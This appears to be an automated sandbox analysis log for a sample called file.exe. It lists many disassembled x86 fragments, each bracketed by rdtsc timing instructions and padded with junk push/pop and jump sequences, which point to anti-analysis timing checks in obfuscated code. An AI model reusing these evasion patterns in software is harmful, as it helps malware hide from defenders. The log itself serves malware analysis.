Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119ED89 second address: 119ED95 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEDA51D0EB6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119F060 second address: 119F075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA531E8D0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AA5CC second address: 11AA603 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEDA51D0ED1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEDA51D0EC0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AA603 second address: 11AA62D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FEDA531E8C6h 0x00000009 jl 00007FEDA531E8C6h 0x0000000f jmp 00007FEDA531E8D7h 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113928D second address: 1139297 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEDA51D0EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1139297 second address: 11392A1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEDA531E8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A99DE second address: 11A99EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FEDA51D0EB8h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A99EF second address: 11A99F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A9F0F second address: 11A9F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A9F13 second address: 11A9F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FEDA531E8D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AA326 second address: 11AA330 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEDA51D0EC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AA330 second address: 11AA336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B017B second address: 11B0181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AED67 second address: 11AED76 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEDA531E8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AED76 second address: 11AEDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007FEDA51D0EC7h 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007FEDA51D0EBEh 0x00000014 pushad 0x00000015 jp 00007FEDA51D0EB6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AEDB2 second address: 11AEDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AEF15 second address: 11AEF19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AEF19 second address: 11AEF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF203 second address: 11AF220 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FEDA51D0EC2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF48B second address: 11AF497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF497 second address: 11AF49B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF5E7 second address: 11AF613 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FEDA531E8D7h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEDA531E8CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF798 second address: 11AF79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF79E second address: 11AF7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FEDA531E8CEh 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF7BA second address: 11AF7C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEDA51D0EB6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF7C6 second address: 11AF7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AFBBE second address: 11AFBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115C6E3 second address: 115C6E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115C6E9 second address: 115C6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115C6ED second address: 115C6FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEDA531E8C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AFFA7 second address: 11AFFB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007FEDA51D0EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AFFB3 second address: 11AFFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AFFB9 second address: 11AFFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEDA51D0EB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AFFC3 second address: 11AFFC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AFFC7 second address: 11AFFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FEDA51D0EC2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AFFE3 second address: 11AFFE8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4D19 second address: 11B4D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FEDA51D0EB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4D29 second address: 11B4D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4E67 second address: 11B4E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B52F5 second address: 11B5302 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEDA531E8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B543E second address: 11B5442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4A2B second address: 11B4A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEDA531E8C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FEDA531E8C6h 0x00000012 jmp 00007FEDA531E8CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4A4B second address: 11B4A4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B5770 second address: 11B5779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B5779 second address: 11B577D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B58DA second address: 11B58E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B58E0 second address: 11B58E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B58E4 second address: 11B58EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B58EA second address: 11B58F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B58F0 second address: 11B58F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B58F6 second address: 11B58FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B5A4D second address: 11B5A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B5A51 second address: 11B5A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B5A59 second address: 11B5A60 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9792 second address: 11B979E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEDA51D0EB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B979E second address: 11B97A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177419 second address: 117741E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177776 second address: 1177791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA531E8D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177AF3 second address: 1177B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1178396 second address: 11783AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEDA531E8C6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jbe 00007FEDA531E8D8h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11783AC second address: 115C6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EBAh 0x00000009 popad 0x0000000a nop 0x0000000b and edx, 7935C311h 0x00000011 call dword ptr [ebp+122D24C2h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9A61 second address: 11B9A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9A6C second address: 11B9A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9A70 second address: 11B9A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEDA531E8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FEDA531E8CCh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9A94 second address: 11B9A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9A9B second address: 11B9AB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007FEDA531E8C6h 0x0000000b jmp 00007FEDA531E8D0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9AB8 second address: 11B9AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEDA51D0EBCh 0x0000000c jmp 00007FEDA51D0EBCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9D60 second address: 11B9D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9EA1 second address: 11B9EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EBDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B9EB7 second address: 11B9ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FEDA531E8CEh 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FEDA531E8C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BA42A second address: 11BA43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 push ecx 0x00000009 pushad 0x0000000a jc 00007FEDA51D0EB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE84C second address: 11BE859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE859 second address: 11BE868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE868 second address: 11BE86C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE86C second address: 11BE8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c je 00007FEDA51D0EB6h 0x00000012 jmp 00007FEDA51D0EC7h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 jc 00007FEDA51D0EB6h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pop ebx 0x00000022 popad 0x00000023 push ebx 0x00000024 jmp 00007FEDA51D0EC2h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FEDA51D0EC5h 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11BE8E1 second address: 11BE8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E423 second address: 113E43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E43B second address: 113E440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E440 second address: 113E461 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FEDA51D0EC9h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C4E0B second address: 11C4E20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEDA531E8CFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C4F94 second address: 11C4FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEDA51D0EC0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11C75B9 second address: 11C75E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007FEDA531E8C6h 0x00000012 jmp 00007FEDA531E8D3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE055 second address: 11CE08F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBAh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FEDA51D0ECDh 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007FEDA51D0EB6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE08F second address: 11CE095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE095 second address: 11CE0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEDA51D0EC3h 0x0000000c jmp 00007FEDA51D0EBCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE1F4 second address: 11CE20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FEDA531E8CFh 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177D39 second address: 1177D68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FEDA51D0EB6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jg 00007FEDA51D0EBCh 0x00000014 pop ecx 0x00000015 nop 0x00000016 mov edi, dword ptr [ebp+122D3A95h] 0x0000001c push 00000004h 0x0000001e mov edx, dword ptr [ebp+122D37BDh] 0x00000024 nop 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177D68 second address: 1177D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA531E8D7h 0x00000009 popad 0x0000000a je 00007FEDA531E8CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1177D8C second address: 1177DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEDA51D0EC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE3B4 second address: 11CE3B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE513 second address: 11CE51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE51B second address: 11CE52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FEDA531E8C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11CE52A second address: 11CE550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEDA51D0EBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FEDA51D0EB6h 0x00000012 pushad 0x00000013 popad 0x00000014 jno 00007FEDA51D0EB6h 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D1C0B second address: 11D1C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D63B8 second address: 11D63BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
